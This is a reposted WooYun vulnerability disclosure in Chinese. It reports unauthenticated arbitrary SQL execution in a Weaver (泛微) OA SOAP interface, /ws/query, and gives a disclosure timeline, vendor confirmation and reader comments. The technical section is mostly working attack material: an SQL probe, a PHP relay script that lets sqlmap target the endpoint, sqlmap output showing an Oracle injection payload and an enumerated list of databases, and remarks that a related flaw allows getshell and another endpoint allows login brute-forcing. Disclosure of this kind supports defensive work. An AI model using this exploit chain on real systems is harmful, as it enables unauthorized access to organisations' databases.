泛微OA某接口无需登录可执行任意SQL语句(附脚本)

admin 2017年4月17日00:17:11评论1,388 views字数 219阅读0分43秒阅读模式
摘要

2016-02-26: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经确认,细节仅向厂商公开
2016-02-29: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

漏洞概要 关注数(72) 关注此漏洞

缺陷编号: WooYun-2016-178866

漏洞标题: 泛微OA某接口无需登录可执行任意SQL语句(附脚本) 泛微OA某接口无需登录可执行任意SQL语句(附脚本)

相关厂商: 上海泛微网络科技股份有限公司

漏洞作者: 浮萍

提交时间: 2016-02-26 16:10

公开时间: 2016-05-26 17:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

11人收藏


漏洞详情

披露状态:

2016-02-26: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经确认,细节仅向厂商公开
2016-02-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

荒废了
啥都不会
找工作啊

详细说明:

先以本地为例

http://localhost:8088/ws

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

code 区域
http://localhost:8088/ws/query?wsdl

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

竟然提示

code 区域
<faultstring>Unmarshalling Error: unexpected element (uri:"http://**.**.**.**/", local:"arg0"). Expected elements are &lt;{}arg1&gt;,&lt;{}arg0&gt; </faultstring>

搜索

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

提示是参数问题

改代码肯定是不行的

那就改参数吧

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

ORA-00900: 无效 sql 语句

看来是可以的

更改第一个参数

code 区域
select SYS_CONTEXT('USERENV','CURRENT_USER') from dual

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

查看用户量

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

任意SQL执行

继续中转

code 区域
<?php
$arg0=$_GET['sql'];
header("content-type:text/html;charset=utf-8");
try {
$client = new SoapClient('http://localhost:8088/ws/query?wsdl');
$xml = "
<SOAP-ENV:Envelope xmlns:SOAP-ENV='http://**.**.**.**/soap/envelope/' xmlns:soap='http://**.**.**.**/wsdl/soap/' xmlns:xsd='http://**.**.**.**/1999/XMLSchema' xmlns:xsi='http://**.**.**.**/1999/XMLSchema-instance' xmlns:m0='http://**.**.**.**/' xmlns:SOAP-ENC='http://**.**.**.**/soap/encoding/' xmlns:urn='http://**.**.**.**/'>
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:queryBy>
<arg0>1</arg0>
<arg1>1</arg1>
</urn:queryBy>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
$result=$client->queryBy(array('arg0'=>$arg0,'arg1'=>'1'));
echo $result->return ;//显示结果
} catch (SOAPFault $e) {
print_r('Exception:'.$e);
}
?>

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

SQL注入

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sql
Type: inline query
Title: Oracle inline queries
Payload: sql=(SELECT CHR(113)||CHR(115)||CHR(112)||CHR(99)||CHR(113)||(SELEC
T (CASE WHEN (8499=8499) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR(
112)||CHR(97)||CHR(113) FROM DUAL)
---
[15:39:49] [INFO] the back-end DBMS is Oracle
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: Oracle
code 区域
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

漏洞证明:

官方:http://**.**.**.**:9085/ws/query?wsdl

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

SQL注入就不进行了 毕竟可以执行SQL语句

http://**.**.**.**/ws/query?wsdl

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

http://**.**.**.**/ws/query?wsdl

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

http://**.**.**.**/bugs/wooyun-2015-0148980

这个估计还没修复 可以getshell

http://localhost:8088/ws/ew?wsdl

可以用于爆破登录

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

其他问题估计还有 自测吧

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-02-26 17:11

厂商回复:

漏洞确认,会尽快安排处理,非常感谢!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-02-26 16:18 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    3

    找工作,你在哪个地方啊?

  2. 2016-02-26 16:22 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    2

    @路人毛 准备去郑州找

  3. 2016-02-26 16:25 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    2

    @浮萍 哦哦 我们公司南昌那边要人

  4. 2016-02-26 16:28 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    1

    @路人毛 谢了哦

  5. 2016-03-02 15:01 | ω电池ω ( 路人 | Rank:4 漏洞数:2 | neusoft)

    1

    @浮萍 我是郑州的。。。我们要开发。。。

  6. 2016-03-02 15:59 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    1

    @ω电池ω 谢了呀,四月去帝都

  7. 2016-03-03 11:36 | Joker ( 实习白帽子 | Rank:44 漏洞数:6 | while(age++) { rmb += make(); try { ...)

    1

    @浮萍 来郑州啊。

  8. 2016-03-04 17:58 | 爱上平顶山 泛微OA某接口无需登录可执行任意SQL语句(附脚本) ( 核心白帽子 | Rank:3144 漏洞数:625 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    1

    @Joker 你郑州的?

  9. 2016-04-13 10:34 | shlhack‘s bother ( 普通白帽子 | Rank:395 漏洞数:139 | 以前有个梦,后来我醒了)

    1

    @浮萍 来帝都,收人啊

  10. 2016-04-13 10:50 | 乐乐 ( 普通白帽子 | Rank:251 漏洞数:73 | 一名信息安全员)

    1

    泛微克星!

  11. 2016-05-26 17:25 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    0

    真坑人,现在中专代码居然免费了,前面我花了6 RANK 买的代码居然就是这个中转代码。。。。。。

  12. 2016-05-26 17:50 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    0

    @sysALong 其实很简单的 中转不中转都行的 我是为了方便

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin